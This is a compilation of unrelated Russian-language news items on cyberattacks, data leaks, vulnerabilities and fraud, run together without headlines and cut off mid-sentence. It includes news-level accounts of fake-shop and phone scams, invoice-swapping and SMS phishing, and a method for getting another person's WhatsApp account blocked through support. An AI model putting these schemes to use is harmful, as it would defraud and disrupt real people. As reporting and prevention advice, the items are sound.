Предыдущая такая встреча состоялась в онлайн-формате в 2021 году. В ней приняли участие представители 30 стран.
Специалисты МИД Украины принимают все необходимые меры для восстановления
полноценной стабильной работы сайта
В ночь на 26 января официальный сайт Украины (ukraine.ua) подвергся
кибератаке, в результате чего он в течение нескольких часов был недоступен для
пользователей. Об этом сообщает пресс-служба МИД.
Сообщается, что во второй половине дня доступ к сайту восстановили.
«Специалисты МИД Украины принимают все необходимые меры для восстановления
полноценной стабильной работы сайта. В ближайшее время все еще возможные
временные проблемы с доступом к ресурсу», – говорится в сообщении. Сайт
ukraine.ua был запущен 14 января 2021 года. Это портал для иностранных
аудиторий, где он может получить информацию о стране. Информация на нем
представлена на семи иностранных языках – английском, немецком, французском,
испанском, китайском, арабском и на иврите.
К слову, Польша повысила уровень террористической угрозы из-за кибератаки на Украине. Ранее Минцифры заявило о наличии доказательств причастности России к кибератакам. Как известно, в ночь на 14 января хакеры атаковали около 70 сайтов органов власти. В связи с этим, Украина и НАТО подпишут соглашение об усилении киберсотрудничества. Как сообщалось, глава дипломатии ЕС Жозеп Боррель осудил кибератаки против сайтов украинских государственных учреждений и заявил, что комитет ЕС по вопросам политики и безопасности, а также киберподразделения встретятся, чтобы обсудить, как отреагировать и помочь Киеву.
Напомним, в ночь на 14 января хакеры, выдававшие себя за поляков, атаковали
сайты Министерств Украины, Кабмина и «Дии».
На стартовой странице МИД и Минобразование было размещено сообщение на
украинском, русском и польском языках о том, что личные данные украинцев будут
в общем доступе в сети.
В СБУ заявили, что утечки персональных данных в результате атаки не произошло. Министерство цифровой трансформации обнародовало официальное заявление в связи с хакерской атакой на правительственные сайты. Кстати, осенью министр цифровой трансформации Украины Михаил Федоров раскрыл главные цифровые приоритеты Украины на следующие два года. В частности, он сообщил, что в Украине планируют ввести онлайн-голосование на выборах. Также напомним, что теперь банки без объяснений могут блокировать карты своих клиентов.
Шестеро злоумышленников использовали фейковые интернет-магазины техники. Деньги покупателей присваивали с помощью фишинга, а также получали от них подписку на карточки. За содеянное фигурантам грозит до 12 лет за решеткой.
Схему интернет-мошенничества разоблачили сотрудники управления противодействия киберпреступлениям Одесской области совместно со следственным управлением полиции.
Шестеро мужчин в возрасте 21-24 лет создали более десятка фейковых онлайн- магазинов электротехники и гаджетов. Только что поступал заказ - фигуранты звонили клиентам под видом менеджеров call-центра. Покупателей убеждали, что выбранный товар находится в другом городе, поэтому доставка возможна только при условии полной подписки. В дальнейшем злоумышленники присылали покупателям фишинговые ссылки для уплаты или реквизиты для перевода денег.
Собрав с помощью фишинга банковские реквизиты граждан, злоумышленники присваивали из них деньги. Также они присваивали подписку, полученную на карточки, и в дальнейшем прекращали связь с клиентами. Убытки устанавливаются.
Фигурантам сообщено о подозрении в совершении уголовного правонарушения, предусмотренного ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Подозреваемым грозит до 12 лет лишения свободы с конфискацией имущества. Участникам преступной группы избрана мера пресечения в виде содержания под стражей с возможностью внесения залога.
Процессуальное руководство осуществляет прокуратура Одесской области.
• Source: cyberpolice.gov.ua/news/kiberpolicziya-odeshhyny-vykryla-zlochynnu- grupu-v-internet-shaxrajstvi-z-prodazhem-neisnuyuchyx-tovariv-8810/
В судах США [фиксируется](https://www.techdirt.com/articles/20211210/12134948095/beware- copyleft-trolls.shtml) появление феномена копилефтных троллей, которые применяют агрессивные схемы развязывания массовых судебных разбирательств, пользуясь беспечностью пользователей при заимствовании контента, распространяемого под разными открытыми лицензиями. При этом предложенное профессором Дэкстоном Стюартом (Daxton R. Stewart) наименование "копилефтный тролль", рассматривается как результат эволюции "копирайтных троллей" и напрямую не связано с понятием "копилефт".
В частности, атаки копилефтных троллей могут производиться как при распространении контента под пермиссивной лицензией Creative Commons Attribution 3.0 (CC-BY), так и под копилефт лицензией Creative Commons Attribution ShareAlike 3.0 (CC-BY-SA). Желающие заработать на судебных разбирательствах фотографы и художники размещают на Flickr или Wikipedia свои работы под лицензиями семейства CC-BY, после чего целенаправленно выявляют пользователей, нарушающих условия лицензии, и требуют выплаты авторских отчислений, которые составляют от $750 до $3500 долларов за каждое нарушение. В случае отказа выплачивать отчисления в суд направляется иск о нарушении авторских прав.
Лицензии CC-BY требуют при копировании и распространении материала обязательного указания авторства и лицензии со ссылками. В случае невыполнения данных условий при использовании лицензий Creative Commons до версии 3.0 включительно лицензия может быть незамедлительно отозвана с прекращением действия всех прав лицензиата, предоставленных ему данной лицензией, после чего правообладатель может добиваться через суд финансовых взысканий за нарушение авторских прав. В лицензиях Creative Commons 4.0 для предотвращения злоупотреблений c отзывом лицензии был добавлен механизм, предоставляющий 30 дней на устранение нарушений и позволяющий автоматически восстанавливать отозванные права.
У многих пользователей складывается ложное представление, что если фотография размещена на Wikipedia и распространяется под лицензией CC-BY, то она предоставлена в свободный доступ и её можно без лишних формальностей использовать в своих материалах. Поэтому многие при копировании фотографий из коллекций свободных материалов не утруждают себя упоминанием автора, а если и указывают автора, забывают поставить полную ссылку на оригинал или ссылку на текст лицензии CC-BY. При распространении контента под старыми версиями лицензии Creative Commons подобных нарушений достаточно для отзыва лицензии и предъявления судебного иска, чем и пользуются копилефтные тролли.
Из недавних инцидентов отмечается история с блокировкой Twitter- канала @Foone, посвящённого старому аппаратному обеспечению. Ведущий канала разместил взятую из Wikipedia фотографию фотоаппарата SONY MAVICA CD200, распространяемую на условиях CC-BY, но не упомянул автора, после чего владелец прав на фото отправил в Twitter DMCA-запрос о нарушении авторских прав, который привёл к блокировке учётной записи.
Сыховский районный суд Львова вынес приговоры 5 соучастникам мошеннической схемы, которая заключалась в торговле поддельной продукцией фирмы Apple. Организатор – львовянин, который арендовал офис и квартиру (под склад).
«Компания» оформила нотариально заверенные поручения на подставных лиц, от имени которых реализовывала контрафактную продукцию через несколько торговых интернет-площадок, включающих собственный интернет-магазин, а также страницы в Instagram, OLX и др.
Мошенники тщательно скрывали место нахождения офиса и склада и свои настоящие имена, чтобы ввести в заблуждение клиентов и избежать раскрытия со стороны правоохранительных органов. Они продавали неоригинальную продукцию, предлагая покупателям низкую цену, которую выдавали за скидки.
В качестве оплаты за сою продукцию, они предлагали покупателям наложенный платеж Новой Почты, деньги за который поступали также на карты, оформленные на подставных лиц. Получив контрафактные iPhone или наушники AirPods, клиенты, по условиям Новой Почты, не могли проверить содержимое упаковок, запечатанных в пленку заводским способом. Такую упаковку мошенники производили самостоятельно, на специальном оборудовании.
Кроме того, на упаковку, напоминающую оригинальную, преступники клеили серийные номера, идентичные реально существующим, поэтому, покупатели даже могли ввести на официальном сайте номер устройства и убедиться в том, что оно реально существует.
В реальности же, в коробках под слоем пленки скрывались подделки низкого качества, обнаружив которые, клиенты понимали, что их обманули, однако все попытки пожаловаться в магазин или найти его реальное местонахождение, заканчивались ничем.
В штате мошеннического предприятия были организатор-директор, который договаривался с поставщиками контрафакта, закупал оборудование для упаковки и обеспечивал работу офиса; контент-менеджер, который занимался наполнением сайтов, маркетолог, рекламировавший сайты и товары, а также другие участники, принимавшие платежи через подставных лиц, и занимавшиеся упаковкой и отправкой продукции.
Все данные о заказчиках и реализованной продукции, мошенники заносили в общую таблицу в облачном хранилище Google. В ней же они записывали, под каким выдуманным именем менеджер продал товар тому или иному клиенту, чтобы соучастники не путались в показаниях.
На основании заявлений 17 потерпевших, ущерб которых составил от 2,300 до 5,500 грн, правоохранители возбудили уголовное дело по факту мошенничества. Решением суда, все участники преступной группы получили наказание в виде 5 лет лишения свободы (с конфискацией имущества), однако реальный срок был заменен для них испытательным – 3 года для организатора и по 2,5 для пособников.
Разработчики децентрализованного протокола обмена сообщений Matrix, [раскрыли критическую проблему безопасности](https://matrix.org/blog/2021/09/13/vulnerability-disclosure-key- sharing), затрагивающую большинство клиентов и библиотек.
Уязвимости подвержены и самые популярные решения, такие как Element, FluffyChat, Nheko, Cinny и SchildiChat.
При определенных обстоятельствах можно обманом заставить уязвимых клиентов раскрыть ключи шифрования для сообщений. Для этого необходимо либо напрямую скомпрометировать их учетные данные, либо скомпрометировать сервер.
Таким образом, наибольший риск представляют пользователи, находящиеся в зашифрованных комнатах, на не проверенных серверах. Администраторы вредоносных серверов могут шпионить за сообщениями, отправляемыми уязвимыми клиентами в этой комнате.
Разработчики также сообщают, что это не уязвимость в протоколах Matrix, а ошибка реализации в некоторых клиентах Matrix и SDK, которые поддерживают сквозное шифрование.
Уже доступны исправленные версии уязвимых клиентов, разработчики просят обновить используемые приложения как можно скорее и приносят извинения за неудобства.
Жертвами кибермошенников чаще всего становятся женщины в возрасте старше 55 лет, сообщил следователь по особо важным делам Следственного комитета Дмитрий Бродко во время заседания проекта БЕЛТА "Экспертная среда" на тему "Борьба с киберпреступностью".
"В Следственном комитете провели анализ совершения преступлений по различным направлениям, анализ социально-демографических характеристик потерпевших: это женщина в возрасте старше 55 лет, как правило, пенсионерка. Соответственно, это наши мамы и бабушки, которым мы дарим телефоны, подключаем социальные сети, но не объясняем, как правильно ими пользоваться. Элементарная цифровая грамотность, цифровая безопасность пенсионерам не разъясняется. Профилактика - это основное, - сказал Дмитрий Бродко. - Постоянно повторяется "не передавайте реквизиты банковских карт, бросайте трубку, если это подозрительный звонок". Но, к сожалению, люди продолжают поддаваться на уловки преступников".
В этом году Следственный комитет подготовил методические рекомендации, проанализировав факты хищения денежных средств у организаций, которые осуществляются посредством подмены банковских реквизитов. "Есть такая тема, когда ложное письмо приходит на корпоративную почту от якобы контрагента, который находится за рубежом, что у них изменились реквизиты счетов. На основании этого Следственным комитетом подготовлены конкретные указания, что делать в таких случаях, какие степени защиты должны быть установлены, какие антивирусники, - отметил следователь по особо важным делам. - Буквально в июле минское предприятие рассталось с 200 тыс. евро. При проверке оказалось антивируса на компьютере нет, систем безопасности никаких нет, пароль на компьютер не установлен. Более того, логин и пароль от электронной почты главного бухгалтера записан на листке, который приклеен к монитору. Зачастую предприятия просто относятся безразлично к внедрению инструментов по защите. Не ставится даже антивирус, меры безопасности не разъясняются. Сегодня очень актуальна именно защита информации, защита коммерческой тайны, финансов".
Как добавил старший оперуполномоченный по особо важным делам главного управления по противодействию киберпреступности Министерства внутренних дел Александр Ластовский, в народе такая преступная схема получила название "человек посередине". "Есть два свежих примера этого года, когда предприятия, осуществляя пересылку документов с реквизитами, платежных поручений, стали жертвами такого преступления. Третье лицо, которое внедрилось в переписку и которое отслеживало пересылку реквизитов, в последний момент изменило реквизиты оплаты. Вследствие чего огромная сумма денег была отправлена мошеннику. Наше предприятие ждет подтверждения произведенной оплаты, а оно не приходит. Поскольку в обоих случаях речь идет о зарубежных партнерах, отдаленных от нас (Китай, Вьетнам), то из-за разницы часовых поясов иногда невозможно подтвердиться звонком. В таких случаях необходимо шифровать почту, которую вы пересылаете, архивировать. Пароль от архива желательно каким-то образом направлять тому предприятию, с которым ведется переписка", - уточнил он.
Также необходимо всегда сверять реквизиты того, что и куда вы переводите. Эти два простых правила практически на 100% могут уберечь от подобных неприятностей, - уверен Александр Ластовский. - Если мы говорим о предприятиях, нельзя не вспомнить не теряющей актуальности схемы преступлений, когда должностные лица оставляют в компьютере на постоянном хранении ключ электронной цифровой подписи, когда посредством завирусованного компьютера неизвестные лица получают доступ к платежным реквизитам, формируется платежное поручение и с компьютера, если там оставлена флешка с цифровой подписью, похищаются деньги. Это схема классическая и до сих пор хорошо срабатывает".
Возможно, эта уязвимость уже устранена.
Специалист по кибербезопасности из компании ESET Джейк Мур (Jake Moore) обнаружил и опубликовал в Twitter способ, как можно заблокировать чужой аккаунт WhatsApp — достаточно написать в техподдержку сервиса и указать номер телефона, привязанный к аккаунту.
Джейк Мур нашёл слабое место в системе администрирования платформы в справочном разделе. Там говорится, что если телефон потерян или украден, то можно попросить техподдержку заблокировать аккаунт WhatsApp, отправив ей электронное письмо с номером телефона. Эксперт проверил этот метод на тестовом телефоне и получил положительный результат — техподдержка заблокировала аккаунт без каких-либо дополнительных проверок. При этом он использовал почтовый адрес, который не был связан с ним.
Это может быть как опасно для честных пользователей мессенджера, так и полезно для тех, кто столкнулся с кражей или шпионажем. Однако стоит учесть, что техподдержка WhatsApp только блокирует учётную запись, а не удаляет её окончательно. Владелец аккаунта может получать сообщения в течение 30 дней и восстановить свой аккаунт, если успеет — иначе он будет стёрт навеки.
Позже Джейк Мур написал ещё один твит, в котором сказал, что, похоже, уязвимость исправлена. Когда он попытался повторить свой эксперимент, техподдержка WhatsApp ответила, что получила его запрос и ответит, когда сможет. Возможно, после раскрытия уязвимости мессенджер был завален заявками на блокировку аккаунтов, или же механизм блокировки был изменён.
Grok-1.5V стал первым шагом к созданию ИИ, который может разделять пространство и время.
Компания Илона Маска xAI представила свою первую мультимодальную модель, Grok 1.5 Vision (Grok-1.5V). Модель разработана для конкуренции с OpenAI и обладает возможностью анализа текстов, документов, графиков, диаграмм, скриншотов и фотографий.
В ноябре 2023 года компания выпустила первую версию своей модели Grok, а в марте xAI опубликовала в открытом доступе архитектуру и веса базовой модели. Новая мультимодальная модель Grok 1.5 Vision появилась всего через месяц после.
Согласно данным с сайта компании, Grok 1.5V способен связывать физический и цифровой миры. Модель может, например, преобразовать изображение блок-схемы в код Python или рассчитать калорийность продукта по этикетке с пищевой ценностью. Также она может создать сказку на основе рисунка ребенка или объяснить, почему смешной тот или иной мем.
Пример работы с Grok 1.5V (переведено)
Модель не только развлекает, но и выполняет практические задачи: преобразует таблицы в формат CSV, помогает исправлять ошибки в коде, а также дает советы по ремонту дома на основе предоставленных изображений. Результаты тестов показали, что Grok 1.5V значительно превосходит другие модели ИИ.
Сравнение выполнения различных задач Grok 1.5V с другими моделями
Кроме того, xAI представила новый бенчмарк RealWorldQA, который оценивает способность понимания реального мира в пространственном аспекте. Новый бенчмарк RealWorldQA создан для оценки базовых способностей понимания реального мира мультимодальными моделями.
Несмотря на то, что многие задачи из бенчмарка кажутся простыми для человека, они представляют сложность для современных моделей. В первом выпуске RealWorldQA представлено более 700 изображений с вопросами и проверяемыми ответами, включая анонимизированные изображения из транспортных средств и другие реальные сценарии. Набор данных доступен для скачивания под лицензией CC BY-ND 4.0.
Тест для определения пространственного восприятия модели (переведено)
Илон Маск в недавнем интервью выразил мнение, что к концу 2025 года ИИ будет умнее любого человека. Все внимание теперь приковано к тому, какие улучшения внесет его компания в разработку ИИ в ближайшие месяцы. Компания xAI также планирует значительные улучшения в других областях, таких как аудио, голос и видео.
Модель Grok 1.5 Vision в скором времени станет доступна для тестирования существующим пользователям.
#news Рубрика «Их нравы». По следам утечки в открытый доступ базы на 73 миллиона записей телекоммуникационный провайдер AT&T в США всё же признал, что это его данные. Отрицали в 2019-м, когда база пошла на продажу, отрицали вновь после слива. И наконец, после его изучения исследователями отмалчиваться больше не получается.
Но изворотливость на этом не заканчивается. Откуда слив, упорно скрывают. И как сообщает компания, из 73 миллионов клиентов 65,4 миллиона якобы уже бывшие. У оставшихся 7,6 утекли ещё и пасскоды, но их им сбросили. Остальных уведомят. Видимо, в планах у AT&T было подождать, пока текущих клиентов в слитой базе вообще не останется, но помешали настырные журналисты. А если дождаться, пока они все скончаются от естественных причин, так не нужно и о взломе никого уведомлять.
WallEscape: давняя уязвимость, которая оставалась вне радаров исследователей целых 11 лет
Найдена критическая уязвимость WallEscape в команде «wall», которая позволяет
хакерам создавать поддельные запросы на ввод пароля sudo.
Злоумышленники могут использовать этот изъян, чтобы красть пароли, изменять
буфер обмена и выполнять другие вредоносные действия.
Обновление до версии Util-linux v2.40 полностью устраняет уязвимость, однако
администраторам доступна возможность временного смягчения угрозы.
Сотрудники Службы безопасности Украины (СБУ) блокировали деятельность мошенников, которые "обошли" защиту украинских мобильных операторов в технологии международной телефонии.
Правоохранители установили, что жители Одессы завладели специализированным телекоммуникационным оборудованием и программным обеспечением. Благодаря этому оборудованию можно было делать международные звонки под видом местных.
"Звонки, которые делались по этой технологии, обеспечивали полную анонимность и могли использоваться для нанесения вреда интересам государства", - сообщили в СБУ.
Также злоумышленники разместили оборудование в автомобилях таксистов, которые постоянно меняли местонахождение, и имитировали деятельность реальных абонентов. Все это было сделано в рамках "конспирации".
Во время обысков по адресам проживания фигурантов и в их автомобилях правоохранители изъяли:
компьютерную технику с установленным специальным программным обеспечением;
телекоммуникационное оборудование (GSM-шлюзы, GSM-модемы, SIM-банки);
sim-карты операторов мобильной связи и черновую документацию.
"В рамках уголовного производства по ч. 2 ст. 361 (несанкционированное вмешательство в работу электронно-вычислительных машин, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины устанавливаются все обстоятельства противоправных действий и причастные лица",
Телефонные мошенники опробовали схему отъема средств на национальном авиаперевозчике «Аэрофлоте», выяснили «Известия». Так, они позвонили главному бухгалтеру компании и от имени гендиректора требовали перевести средства за якобы оказанные услуги. Эта история завершилась задержанием злоумышленников, однако с другими организациями срабатывает — руководители и старшие сотрудники крупных компаний переводят средства наравне с обычными людьми, отмечают юристы. Почему такой вид мошенничества приобрел столь крупный масштаб и угрожает ли это конфиденциальным данным компаний — в материале «Известий».
Спасенные миллионы
Последний день новогодних праздников заставил понервничать представителей авиакомпании «Аэрофлот». Как рассказал источник «Известий» в следственных органах, вечером 8 января с главным бухгалтером компании по телефону и мессенджеру связались двое мужчин. От имени гендиректора перевозчика Сергея Александровского они на протяжении часа убеждали ее перевести 15 млн рублей на указанный ими расчетный счет — «для выполнения договора на оказание услуг с контрагентом «Аэрофлота».
— После того как злоумышленники получили отказ, они назначили женщине встречу в офисе авиакомпании на Арбате. В счет выполнения условий договора на оказание услуг просили передать «контрагенту» сумму уже втрое меньше — 5 млн рублей, — сообщил собеседник.
В итоге 9 января в 21:00 мошенники встретили в офисе не главного бухгалтера с деньгами, а оперативников. Были задержаны двое граждан Армении 1995 и 1996 годов рождения. На следующий день в отношении них было возбуждено уголовное дело по ч. 3 ст. 30 и ч. 4 ст. 159 УК РФ — «Покушение на преступление», а также «Мошенничество, совершенное организованной группой в особо крупном размере».
«Известия» направили запрос в пресс-службу «Аэрофлота» с просьбой прокомментировать ситуацию.
Видеозвонок из «полиции»
Подобные случаи не редкость, и далеко не всегда их вовремя удается пресечь. Так, директор АО «Национальный центр вертолетостроения имени М.Л. Миля и Н.И. Камова» Михаил Короткевич также лишился в декабре 2023 года крупной суммы, сообщил источник.
Правоохранительным органам он сообщил, что ему в Telegram написал руководитель и предупредил, что с ним свяжется некий Виктор Лапин, «чтобы задать вопросы». Это и оказался «сотрудник УФСБ», который сообщил, что кто-то хочет взять на имя Михаила кредит.
Дальнейшая цепочка звонков привела мужчину к потере денег. В течение трех часов он исполнил задание звонивших «сотрудников УФСБ» и перевел им около 2 млн рублей. При получении нового поручения — взять кредит 20 млн рублей — он понял, что стал жертвой злоумышленников и обратился в полицию.
Главный специалист одной из крупных консультационных компаний Светлана в декабре прошлого года также перевела мошенникам 2 млн рублей, которые взяла в кредит. Злоумышленники представлялись сотрудниками компании сотовой связи, «Госуслуг» и Центробанка. В ходе разговора женщина лишилась доступа к личному кабинету на «Госуслугах».
Еще один случай также произошел в конце 2023 года. Тогда главного специалиста Российской академии наук (РАН) Севиль Грабеклис мошенница в полицейской форме обманула на 1 млн рублей, сообщал ранее источник «Известий». 15 декабря неизвестный по телефону сообщил ей о якобы смене номера телефона в личном кабинете банка и попытке завладеть суммой со счета в 800 тыс. рублей. После этого по видеосвязи в WhatsApp с женщиной связалась девушка в форме и заявила о возбуждении уголовного дела. Она уговорила Севиль Грабеклис пойти в банк и снять со счета 1 млн рублей, а затем положить эти деньги на счет мошенников.
«Руководители — обычные люди»
О случаях крупного телефонного мошенничества «Известиям» напомнил и председатель Общероссийского профсоюза медиаторов Владимир Кузнецов.
— В мае прошлого года начальника управления денежных переводов одного из крупных банков обманули злоумышленники. Они представились сотрудниками Центробанка и убедили потерпевшую перевести им 3,3 млн рублей, — рассказал он «Известиям».
По мнению юриста, в подобных случаях играет роль неосторожность самих потерпевших, которые не предпринимают мер по проверке сообщаемых мошенниками сведений и выполняют все их требования.
Опытные управленцы, бухгалтеры и другие старшие сотрудники тоже люди со своими слабостями и психологией, отметил в беседе с «Известиями» управляющий партнер адвокатского бюро AVG Legal Алексей Гавришев. Кроме того, высокая должность не всегда свидетельствует о профессионализме, считает он.
— Особенного отличия от обычных людей нет. Контакты руководителей мошенники находят весьма легко, покупая на рынке или в интернете базу данных телефонных номеров, адресов или данных из ГИБДД — причем за сравнительно небольшие деньги, — добавил Алексей Гавришев.
Чаще всего телефонное мошенничество проводится из-за границы либо звонки осуществляются с давно утерянных SIM-карт, что затрудняет идентификацию злоумышленников, отметил юрист. Вернуть свои средства при их выводе на зарубежные счета практически невозможно.
В то же время угрозы конфиденциальным данным компаний телефонные мошенники обычно не несут, отметил Владимир Кузнецов. Их интересуют именно деньги, поскольку злоумышленники хорошо понимают, что получение документов и сведений подобным способом сопряжено с высоким риском раскрытия их личности.
Платформа по поиску уязвимостей Standoff 365 Bug Bounty первой среди аналогичных российских площадок выходит на международный уровень. С помощью платежных агентов платформа сможет выплачивать вознаграждения исследователям безопасности не только в России, но и за ее пределами. Выплаты будут осуществляться в удобной для багхантеров валюте. Об этом CNews сообщили представители компании Positive Technologies.
После запуска Standoff 365 Bug Bounty в мае 2022 г. количество программ багбаунти увеличилось с 2 до 53 и продолжает расти. Свои программы на платформе разместили «Госуслуги», «Одноклассники», «Тинькофф», Rambler&Co, VK, Wildberries.
«Standoff 365 с самого начала задумывалась как площадка, которая сможет привлечь исследователей со всего мира. Мы видим большой спрос со стороны иностранных багхантеров; более того, мы уже получали отчеты из-за рубежа, но выплатить награду до сих пор не могли. Теперь, благодаря нашим платежным агентам, это стало возможным. Количество зарегистрированных на платформе исследователей приближается к 8 тыс. Выход на международную арену для нас — прорывной шаг, который позволит кратно увеличить число этичных хакеров на платформе. Это значит, что значительно расширятся и возможности наших клиентов по реализации багбаунти-программ», — сказал руководитель направления багбанути Standoff 365 Анатолий Иванов, подчеркнув при этом, что платформа будет заключать договоры с исследователями и работать с ними исключительно в рамках российского законодательства.
За полтора года работы Standoff 365 Bug Bounty багхантерам было выплачено около 60 млн руб. Размер вознаграждения варьируется от 9 тыс. до 2,4 млн руб. в зависимости от уровня опасности уязвимости. При этом максимальные выплаты сопоставимы с вознаграждениями на мировых площадках за аналогичные уязвимости.
Всего за этот период было принято около 1,5 тыс. отчетов, в том числе 10% — о критически опасных уязвимостях и еще 19% — об уязвимостях высокой степени опасности. За полтора года работы Standoff 365 Bug Bounty хакеры нашли 71 недостаток в безопасности веб-приложений (по классификации Common Weakness Enumeration, CWE).
С 1 декабря 2023 г. пользователям платформы Standoff 365 доступна программа поиска уязвимостей в системах Wildberries за вознаграждение. В область исследования входят все ресурсы компании, включая сервисы для покупателей, продавцов, курьеров, а также для сотрудников складов и пунктов выдачи заказов. Помимо классической багбаунти, компания запускает программу с особым сценарием: багхантер, который получит полный доступ к личному кабинету тестового продавца, заработает 500 тыс. руб. Об этом CNews сообщили представители Positive Technologies.
По данным Positive Technologies, 74% атак на организации из сферы торговли за первые три квартала 2023 г. закончились утечкой конфиденциальной информации — прежде всего персональных (49%) и учетных (16%) данных. Чаще всего злоумышленники прибегали к использованию ВПО (48%), эксплуатации уязвимостей на внешнем периметре (45%) и социальной инженерии (29%). По словам экспертов, утечки в онлайн-ритейле характеризуются большим объемом скомпрометированных данных — и проблема будет только усугубляться. Поэтому компании этой сферы должны уделить особое внимание вопросам информационной безопасности, определению и верификации недопустимых для бизнеса событий.
Запуск публичной программы позволит крупнейшей цифровой ритейл-платформе проверить защищенность своих сервисов силами 7700 багхантеров, зарегистрированных на площадке Standoff 365 Bug Bounty, с разным опытом и инструментарием. В открытой программе Wildberries увеличила размеры вознаграждений, и за обнаруженные баги исследователи смогут заработать до 250 тыс. руб. При этом за реализацию особо опасных сценариев, состоящих из нескольких этапов (например, за получение полного доступа к личному кабинету тестового продавца), компания готова выплатить этичным хакерам 500 тыс. руб.
В 2023 г. Wildberries участвовала в приватных мероприятиях Standoff Hacks, где багхантеры искали уязвимости в рамках закрытых программ, и выплатила вознаграждения на сумму более 4 млн руб. Специалисты протестировали не только внешний периметр и веб-сервисы организации, но и умные замки, которые скоро начнут использоваться в пунктах выдачи заказов.
](https://bugbounty.standoff365.com/programs/wildberries)
Standoff 365 Bug Bounty — платформа для поиска уязвимостей за вознаграждение и самый быстрый способ убедиться в надежности своей IT-инфраструктуры с помощью тысяч сильнейших хакеров.
bugbounty.standoff365.com
В Positive Technologies подвели итоги работы платформы по поиску уязвимостей Standoff 365 Bug Bounty, запущенной в мае 2022 г. За полтора года количество размещенных программ увеличилось с 2 до 53 и продолжает расти. Размер вознаграждения составляет от 9 тыс. до 3 млн руб. в зависимости от уровня опасности уязвимости. При этом максимальные выплаты сопоставимы с аналогичными вознаграждениями на мировых площадках. Об этом CNews сообщили представители Positive Technologies.
На сегодняшний день на платформе разместили свои программы организации из разных отраслей: ИТ, торговля, финансы, ИТ учреждения. Наибольшее количество программ представлено в секторе IT (38%), среди государственных учреждений (17%) и образовательных платформ (11%).
С момента открытия на платформе зарегистрировалось 7537 исследователей; программы представили Rambler&Co, VK, «Госуслуги», «Одноклассники», «Тинькофф».
«Одним из наиболее значимых показателей результативности платформы является количество полученных валидных отчетов о найденных уязвимостях, — сказал менеджер по продукту Standoff 365 Анатолий Иванов. — Таковыми, как правило, считаются отчеты исследователей, которые прошли верификацию со стороны платформы и представителя программы. Всего багхантеры отправили 1479 отчетов, из которых 10% (152) были с критически опасными уязвимостями и 19% (287) — с уязвимостями высокой степени опасности».
За полтора года работы Standoff 365 Bug Bounty хакеры нашли уязвимости 71 типа по классификации CWE (Common Weakness Enumeration) в веб-приложениях. Недостаток CWE-79 — «Некорректная нейтрализация входных данных при генерировании веб-страниц (межсайтовое выполнение сценариев)» — занял первое место по популярности, так как попал в 22% отчетов.
Одна из ведущих мировых платформ багбаунти HackerOne тоже ведет статистику по CWE, где также публикуются недостатки безопасности, которые ранжируются по количеству отчетов с ними. В Positive Technologies отметили, что данные с двух платформ схожи, а следовательно, Standoff 365 Bug Bounty поддерживает мировые тренды даже в статистике об уязвимостях инфраструктур организаций.
От программы к программе метрика пиковой выплаты может значительно различаться. В одной за критически опасную уязвимость могут выплатить несколько тысяч рублей, а в другой — более 3 млн руб. Размеры вознаграждений зависят от самой компании: ее доходов, масштаба, информации, с которой она работает.
«По нашим данным, ИТ-компании и организации из финансовой сферы выплатили хакерам больше, чем компании из других отраслей, представленных на платформе, — сказал Григорий Прохоров, аналитик исследовательской группы департамента аналитики Positive Technologies. — На них суммарно приходится 81% вознаграждений, несмотря на то что количественно они представлены лишь в 44% программ. Мы отмечаем, что уровень выплат на зарубежных платформах сопоставим с аналогичными программами на Standoff 365 Bug Bounty. Например, на платформе HackerOne вознаграждения по ним могут составлять до $20 тыс. в зависимости от компании — участника программы».
Представители компании Twilio, занимающейся разработкой и предоставлением облачных PaaS-услуг, сообщили, что неизвестные злоумышленники получили доступ к данным некоторых ее клиентов. Ради этого злоумышленники похитили учетные данных сотрудников компании, устроив на них фишинговую атаку через SMS.
«4 августа 2022 года Twilio обнаружила несанкционированный доступ к информации, связанной с ограниченным количеством учетных записей клиентов. Атака была осуществлена с помощью изощренной социальной инженерии, направленной на кражу учетных данных наших сотрудников, — гласит официальное заявление компании. — Злоумышленники использовали украденные учетные данные, чтобы получить доступ к некоторым из наших внутренних систем, где смогли получить доступ к определенной информации клиентов».
Click to expand...
Известно, что в рамках фишинговой атаки на сотрудников Twilio хакеры выдавали
себя за представителей ИТ-отдела компании. В своих SMS-сообщениях они просили
людей перейти по ссылкам, содержащим такие ключевые слова, как Twilio, Okta и
SSO, после чего жертвы попадали на фейковую страницу входа в Twilio. Перейти
по вредоносным ссылкам людей убеждали предупреждениями о том, что действие их
паролей якобы истекло или их пора изменить по плану, так как они устарели.

При этом в Twilio отказались дать комментарии и раскрыть дополнительную
информацию об инциденте, не ответив на вопросы СМИ о том, сколько сотрудников
были скомпрометированы и сколько клиентов в итоге пострадали от этого взлома.
Стоит отметить, что у Twilio насчитывается 26 офисов в 17 странах мира, где
работают более 5000 человек.
«SMS-сообщения исходили из сетей операторов связи США. Мы сотрудничали с операторами связи, чтобы заблокировать атакующих, а также с хостинг- провайдерами, обслуживающими вредоносные URL-адреса, чтобы закрыть эти учетные записи, — добавляют в компании. — Нам известно, что другие компании тоже подверглись подобным атакам, и мы координировали с ними ответ атакующим, включая сотрудничество с операторами связи, чтобы остановить распространение вредоносных сообщений, а также с регистраторами и хостинг- провайдерами, чтобы блокировать вредоносные URL-адреса. Несмотря на эти ответные меры, злоумышленники продолжают менять операторов связи и хостинг- провайдеров, чтобы возобновить атаки».
Click to expand...
Сообщается, что в настоящее время идет расследование случившегося, к которому
уже привлечены правоохранительные органы.
Сразу после обнаружения атаки Twilio аннулировала скомпрометированные учетные
записи сотрудников, чтобы блокировать хакерам доступ к своим системам, и
начала уведомлять клиентов, пострадавших от этого инцидента. Подчеркивается,
что атакующие получили доступ к «ограниченному количеству» данных, поэтому
пострадавших клиентов уведомляют в индивидуальном порядке.
Газета «Коммерсантъ» №166 от
15.09.2021, стр. 10
Персональные данные почти 2 млн из 2,86 млн абонентов проводного
широкополосного интернета «Вымпелкома» были в свободном доступе с 27 августа
по 13 сентября. По объему инцидент может стать одной из крупнейших утечек
персональных данных в этом году. В «Вымпелкоме» проводят расследование и
заверяют, что все данные уже под защитой и клиентам ничего не угрожает. На
продажу на теневых форумах база пока не выложена, но, по мнению экспертов, «ее
скачали не один раз».
Независимый эксперт по компьютерной безопасности Боб Дьяченко в своем
Twitter
сообщил, что в свободном доступе оказались персональные данные абонентов
домашнего интернета «Вымпелкома» (бренд «Билайн»), в том числе паспортные
данные, электронные почты и номера телефонов. Информация была доступна через
